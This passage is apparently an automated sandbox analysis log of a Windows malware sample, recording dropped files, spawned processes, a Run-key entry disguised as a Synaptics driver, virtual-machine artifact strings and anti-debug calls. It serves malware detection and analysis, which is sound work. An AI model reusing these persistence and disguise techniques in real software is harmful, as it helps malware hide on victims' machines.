                              Source: Yara match, File source: C:\Users\user\Documents\AFWAAFRXKO\~$cache1, type: DROPPED
                              Source: Yara match, File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe, Command line argument: pJ)4_2_002949C0
                              Source: C:\Users\user\Desktop\file.exe, Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                              Source: C:\ProgramData\Synaptics\Synaptics.exe, Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                              Source: C:\Users\user\Desktop\file.exe, File read: C:\Users\user\Desktop\desktop.ini
                              Source: C:\Users\user\Desktop\file.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                              Source: file.exe, ReversingLabs: Detection: 92%
                              Source: Setup.exe, String found in binary or memory: Pre-Installation Warnings:
                              Source: C:\Users\user\Desktop\file.exe, File read: C:\Users\user\Desktop\file.exe
                              Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\._cache_file.exe "C:\Users\user\Desktop\._cache_file.exe"
                              Source: C:\Users\user\Desktop\file.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                              Source: C:\Users\user\Desktop\._cache_file.exeProcess created: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe c:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe
                              Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                              Source: unknownProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeProcess created: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe "C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe" c:\36a8a8e2fed651ec27d1eed188bb35\1033\EULA.rtf /p
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeProcess created: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe "C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe" c:\36a8a8e2fed651ec27d1eed188bb35\1033\EULA.rtf /p
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 3860
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: wldp.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: profapi.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: edputil.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: dui70.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: duser.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: explorerframe.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: thumbcache.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: assignedaccessruntime.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: windows.fileexplorer.common.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: linkinfo.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: structuredquery.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: windows.storage.search.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: windows.staterepositoryps.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: sspicli.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: samcli.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: samlib.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: twinapi.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: apphelp.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: networkexplorer.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: ntshrui.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: cscapi.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: mfc42u.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: propsys.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: winmm.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: urlmon.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: xmllite.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: iertutil.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: srvcli.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: netutils.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeSection loaded: msxml3.dll
                              Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                              Source: C:\ProgramData\Synaptics\Synaptics.exe File written: C:\Users\user\AppData\Local\Temp\dU7ZdIR.ini
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe Window found: window name: SysTabControl32
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe File opened: C:\Windows\SysWOW64\MSFTEDIT.DLL
                              Source: Window Recorder Window detected: More than 3 window changes detected
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe Window detected: MICROSOFT SOFTWARE LICENSE TERMS MICROSOFT VISUAL C++ 2010 RUNTIME LIBRARIES
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe Window detected: Number of UI elements: 15
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
                              Source: file.exe Static file information: File size 6490624 > 1048576
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
                              Source: file.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x586200
                              Source: Binary string: sfxcab.pdb source: file.exe, ._cache_file.exe.0.dr, Synaptics.exe.0.dr
                              Source: Binary string: sqmapi.pdb source: Setup.exe, Setup.exe, 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, sqmapi.dll.2.dr
                              Source: Binary string: SetupEngine.pdb source: Setup.exe, Setup.exe, 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, SetupEngine.dll.2.dr
                              Source: Binary string: patchhooks.pdb source: vc_red.msi.2.dr
                              Source: Binary string: Setup.pdb source: Setup.exe, Setup.exe, 00000004.00000002.2623419946.0000000000291000.00000020.00000001.01000000.00000008.sdmp, Setup.exe, 00000004.00000000.1389333890.0000000000291000.00000020.00000001.01000000.00000008.sdmp, Setup.exe.2.dr
                              Source: Binary string: SetupUi.pdb source: Setup.exe, Setup.exe, 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, SetupUi.dll.2.dr
                              Source: Binary string: SetupResources.pdb source: SetupResources.dll4.2.dr, SetupResources.dll3.2.dr, SetupResources.dll1.2.dr, SetupResources.dll6.2.dr, SetupResources.dll7.2.dr, SetupResources.dll.2.dr, SetupResources.dll5.2.dr, SetupResources.dll2.2.dr, SetupResources.dll0.2.dr, SetupResources.dll8.2.dr
                              Source: C:\Users\user\Desktop\._cache_file.exe Code function: 2_2_010029C2 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,2_2_010029C2
                              Source: C:\Users\user\Desktop\._cache_file.exe Code function: 2_2_010065F3 push ecx; ret 2_2_01006603
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe Code function: 4_2_00293DF5 push ecx; ret 4_2_00293E08
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe Code function: 4_2_6396AA75 push ecx; ret 4_2_6396AA88
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe Code function: 4_2_63972709 push ecx; ret 4_2_6397271C
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe Code function: 4_2_6C5D4821 push ecx; ret 4_2_6C5D4834
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe Code function: 4_2_6C5D1B89 push ecx; ret 4_2_6C5D1B9C
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe Code function: 4_2_6C926F06 push ecx; ret 4_2_6C926F19
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe Code function: 4_2_6C91E265 push ecx; ret 4_2_6C91E278

                              Persistence and Installation Behavior

                              Source: C:\ProgramData\Synaptics\Synaptics.exe File created: C:\Users\user\Documents\AFWAAFRXKO\~$cache1
                              Source: C:\Users\user\Desktop\._cache_file.exe File created: C:\36a8a8e2fed651ec27d1eed188bb35\1031\SetupResources.dll
                              Source: C:\Users\user\Desktop\._cache_file.exe File created: C:\36a8a8e2fed651ec27d1eed188bb35\3082\SetupResources.dll
                              Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\Synaptics\RCX3CE.tmp
                              Source: C:\Users\user\Desktop\._cache_file.exe File created: C:\36a8a8e2fed651ec27d1eed188bb35\2052\SetupResources.dll
                              Source: C:\Users\user\Desktop\._cache_file.exe File created: C:\36a8a8e2fed651ec27d1eed188bb35\sqmapi.dll
                              Source: C:\Users\user\Desktop\._cache_file.exe File created: C:\36a8a8e2fed651ec27d1eed188bb35\SetupEngine.dll
                              Source: C:\Users\user\Desktop\._cache_file.exe File created: C:\36a8a8e2fed651ec27d1eed188bb35\1028\SetupResources.dll
                              Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\Synaptics\Synaptics.exe
                              Source: C:\Users\user\Desktop\._cache_file.exe File created: C:\36a8a8e2fed651ec27d1eed188bb35\1036\SetupResources.dll
                              Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\Desktop\._cache_file.exe
                              Source: C:\Users\user\Desktop\._cache_file.exe File created: C:\36a8a8e2fed651ec27d1eed188bb35\1049\SetupResources.dll
                              Source: C:\Users\user\Desktop\._cache_file.exe File created: C:\36a8a8e2fed651ec27d1eed188bb35\1033\SetupResources.dll
                              Source: C:\Users\user\Desktop\._cache_file.exe File created: C:\36a8a8e2fed651ec27d1eed188bb35\SetupUi.dll
                              Source: C:\Users\user\Desktop\._cache_file.exe File created: C:\36a8a8e2fed651ec27d1eed188bb35\1041\SetupResources.dll
                              Source: C:\Users\user\Desktop\._cache_file.exe File created: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe
                              Source: C:\Users\user\Desktop\._cache_file.exe File created: C:\36a8a8e2fed651ec27d1eed188bb35\1040\SetupResources.dll
                              Source: C:\Users\user\Desktop\._cache_file.exe File created: C:\36a8a8e2fed651ec27d1eed188bb35\1042\SetupResources.dll
                              Source: C:\Users\user\Desktop\._cache_file.exe File created: c:\36a8a8e2fed651ec27d1eed188bb35\1033\eula.rtf
                              Source: C:\Users\user\Desktop\._cache_file.exe File created: c:\36a8a8e2fed651ec27d1eed188bb35\1041\eula.rtf
                              Source: C:\Users\user\Desktop\._cache_file.exe File created: c:\36a8a8e2fed651ec27d1eed188bb35\1042\eula.rtf
                              Source: C:\Users\user\Desktop\._cache_file.exe File created: c:\36a8a8e2fed651ec27d1eed188bb35\1028\eula.rtf
                              Source: C:\Users\user\Desktop\._cache_file.exe File created: c:\36a8a8e2fed651ec27d1eed188bb35\2052\eula.rtf
                              Source: C:\Users\user\Desktop\._cache_file.exe File created: c:\36a8a8e2fed651ec27d1eed188bb35\1040\eula.rtf
                              Source: C:\Users\user\Desktop\._cache_file.exe File created: c:\36a8a8e2fed651ec27d1eed188bb35\1036\eula.rtf
                              Source: C:\Users\user\Desktop\._cache_file.exe File created: c:\36a8a8e2fed651ec27d1eed188bb35\1031\eula.rtf
                              Source: C:\Users\user\Desktop\._cache_file.exe File created: c:\36a8a8e2fed651ec27d1eed188bb35\3082\eula.rtf
                              Source: C:\Users\user\Desktop\._cache_file.exe File created: c:\36a8a8e2fed651ec27d1eed188bb35\1049\eula.rtf
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application\VSSetup
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe Code function: 4_2_6C8EF721 StartServiceW,4_2_6C8EF721
                              Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver
                              Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 3297
                              Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 6662
                              Source: C:\Users\user\Desktop\._cache_file.exeDropped PE file which has not been started: C:\36a8a8e2fed651ec27d1eed188bb35\1031\SetupResources.dll
                              Source: C:\Users\user\Desktop\._cache_file.exeDropped PE file which has not been started: C:\36a8a8e2fed651ec27d1eed188bb35\3082\SetupResources.dll
                              Source: C:\Users\user\Desktop\._cache_file.exeDropped PE file which has not been started: C:\36a8a8e2fed651ec27d1eed188bb35\2052\SetupResources.dll
                              Source: C:\Users\user\Desktop\._cache_file.exeDropped PE file which has not been started: C:\36a8a8e2fed651ec27d1eed188bb35\1028\SetupResources.dll
                              Source: C:\Users\user\Desktop\._cache_file.exeDropped PE file which has not been started: C:\36a8a8e2fed651ec27d1eed188bb35\1036\SetupResources.dll
                              Source: C:\Users\user\Desktop\._cache_file.exeDropped PE file which has not been started: C:\36a8a8e2fed651ec27d1eed188bb35\1049\SetupResources.dll
                              Source: C:\Users\user\Desktop\._cache_file.exeDropped PE file which has not been started: C:\36a8a8e2fed651ec27d1eed188bb35\1033\SetupResources.dll
                              Source: C:\Users\user\Desktop\._cache_file.exeDropped PE file which has not been started: C:\36a8a8e2fed651ec27d1eed188bb35\1041\SetupResources.dll
                              Source: C:\Users\user\Desktop\._cache_file.exeDropped PE file which has not been started: C:\36a8a8e2fed651ec27d1eed188bb35\1040\SetupResources.dll
                              Source: C:\Users\user\Desktop\._cache_file.exeDropped PE file which has not been started: C:\36a8a8e2fed651ec27d1eed188bb35\1042\SetupResources.dll
                              Source: C:\Users\user\Desktop\._cache_file.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_2-2912
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 8108Thread sleep count: 63 > 30
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 8108Thread sleep time: -3780000s >= -30000s
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 8476Thread sleep time: -60000s >= -30000s
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_010046B9 SendDlgItemMessageA,strstr,SetFileAttributesA,GetLastError,CopyFileA,SendDlgItemMessageA,strstr,SetFileAttributesA,CopyFileA,GetLastError,CopyFileA,SetFileAttributesA,SendDlgItemMessageA,_strlwr,GetLastError,MoveFileA,MoveFileA,_strlwr,strstr,FindFirstFileA,strrchr,SendDlgItemMessageA,DeleteFileA,Sleep,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,strchr,strrchr,SendDlgItemMessageA,2_2_010046B9
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C5E8097 memset,memset,FindFirstFileW,DeleteFileW,GetLastError,FindNextFileW,FindClose,4_2_6C5E8097
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C5D4281 memset,EnterCriticalSection,FindFirstFileW,LeaveCriticalSection,ctype,FindNextFileW,FindClose,ResetEvent,CreateThread,CloseHandle,GetLastError,4_2_6C5D4281
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C8D5B82 __EH_prolog3_GS,_memset,FindFirstFileW,FindNextFileW,FindClose,4_2_6C8D5B82
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C8D410A FindFirstFileW,GetFullPathNameW,SetLastError,_wcsrchr,_wcsrchr,4_2_6C8D410A
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C900C91 __EH_prolog3_GS,GetModuleHandleW,GetLastError,GetSystemInfo,GetNativeSystemInfo,GetLastError,GetLastError,GetLastError,_memset,GetNativeSystemInfo,GetLastError,4_2_6C900C91
                              Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000
                              Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000
                              Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
                              Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user
                              Source: Amcache.hve.17.drBinary or memory string: VMware
                              Source: Amcache.hve.17.drBinary or memory string: VMware Virtual USB Mouse
                              Source: Amcache.hve.17.drBinary or memory string: vmci.syshbin
                              Source: Amcache.hve.17.drBinary or memory string: VMware, Inc.
                              Source: Amcache.hve.17.drBinary or memory string: VMware20,1hbin@
                              Source: Amcache.hve.17.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                              Source: Amcache.hve.17.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                              Source: Amcache.hve.17.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                              Source: Synaptics.exe, 00000003.00000002.1980458813.00000000005DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: wordpad.exe, 0000000B.00000003.1627079273.0000000007EE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                              Source: Amcache.hve.17.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                              Source: Amcache.hve.17.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                              Source: Synaptics.exe, 00000003.00000002.1980458813.00000000005AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: Amcache.hve.17.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                              Source: Amcache.hve.17.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                              Source: Amcache.hve.17.drBinary or memory string: vmci.sys
                              Source: wordpad.exe, 0000000B.00000003.1627079273.0000000007EE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: Synaptics.exe, 00000003.00000002.1980458813.00000000005DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWk(
                              Source: Amcache.hve.17.drBinary or memory string: vmci.syshbin`
                              Source: Amcache.hve.17.drBinary or memory string: \driver\vmci,\driver\pci
                              Source: Amcache.hve.17.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                              Source: Amcache.hve.17.drBinary or memory string: VMware20,1
                              Source: Amcache.hve.17.drBinary or memory string: Microsoft Hyper-V Generation Counter
                              Source: Amcache.hve.17.drBinary or memory string: NECVMWar VMware SATA CD00
                              Source: Amcache.hve.17.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                              Source: Amcache.hve.17.drBinary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
                              Source: Amcache.hve.17.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                              Source: Amcache.hve.17.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                              Source: Amcache.hve.17.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                              Source: Amcache.hve.17.drBinary or memory string: VMware PCI VMCI Bus Device
                              Source: Amcache.hve.17.drBinary or memory string: VMware VMCI Bus Device
                              Source: Amcache.hve.17.drBinary or memory string: VMware Virtual RAM
                              Source: Amcache.hve.17.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                              Source: wordpad.exe, 0000000B.00000003.1627079273.0000000007EE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: Amcache.hve.17.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                              Source: C:\Users\user\Desktop\._cache_file.exeAPI call chain: ExitProcess graph end nodegraph_2-2537
                              Source: C:\Users\user\Desktop\._cache_file.exeAPI call chain: ExitProcess graph end nodegraph_2-2873
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeAPI call chain: ExitProcess graph end nodegraph_4-72211
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeProcess information queried: ProcessInformation
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_00292BA5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00292BA5
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C91C78B VirtualProtect ?,-00000001,00000104,?4_2_6C91C78B
                              Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_010029C2 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,2_2_010029C2
                              Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_01005899 InitializeCriticalSectionAndSpinCount,#17,GetProcessHeap,CreateEventA,CreateEventA,CreateEventA,CreateThread,WaitForSingleObject,SendDlgItemMessageA,Sleep,ShowWindow,SetParent,SendDlgItemMessageA,SendDlgItemMessageA,SendDlgItemMessageA,ShowWindow,LoadStringA,LoadStringA,SendDlgItemMessageA,SendDlgItemMessageA,SendDlgItemMessageA,SendDlgItemMessageA,SendDlgItemMessageA,ShowWindow,CreateFileA,GetFileSize,ReadFile,CloseHandle,DeleteFileA,SendDlgItemMessageA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,ExpandEnvironmentStringsA,CreateProcessA,ShowWindow,WaitForSingleObject,GetExitCodeProcess,CloseHandle,ShowWindow,LoadStringA,MessageBoxA,DeleteCriticalSection,ExitProcess,2_2_01005899
                              Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_010062FF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_010062FF
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_00292BA5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00292BA5
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_002945BE _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_002945BE
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6396B38A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6396B38A
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_639687C1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_639687C1
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C5D171F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6C5D171F
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C8F76A7 __EH_prolog3,GetModuleHandleW,GetProcAddress,SetThreadStackGuarantee,SetUnhandledExceptionFilter,GetCommandLineW,4_2_6C8F76A7
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C91EB6A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6C91EB6A
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C91B091 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6C91B091
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeMemory allocated: page read and write | page guard
                              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\._cache_file.exe "C:\Users\user\Desktop\._cache_file.exe"
                              Source: C:\Users\user\Desktop\file.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeProcess created: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe "C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe" c:\36a8a8e2fed651ec27d1eed188bb35\1033\EULA.rtf /p
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeProcess created: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe "C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe" c:\36a8a8e2fed651ec27d1eed188bb35\1033\EULA.rtf /p
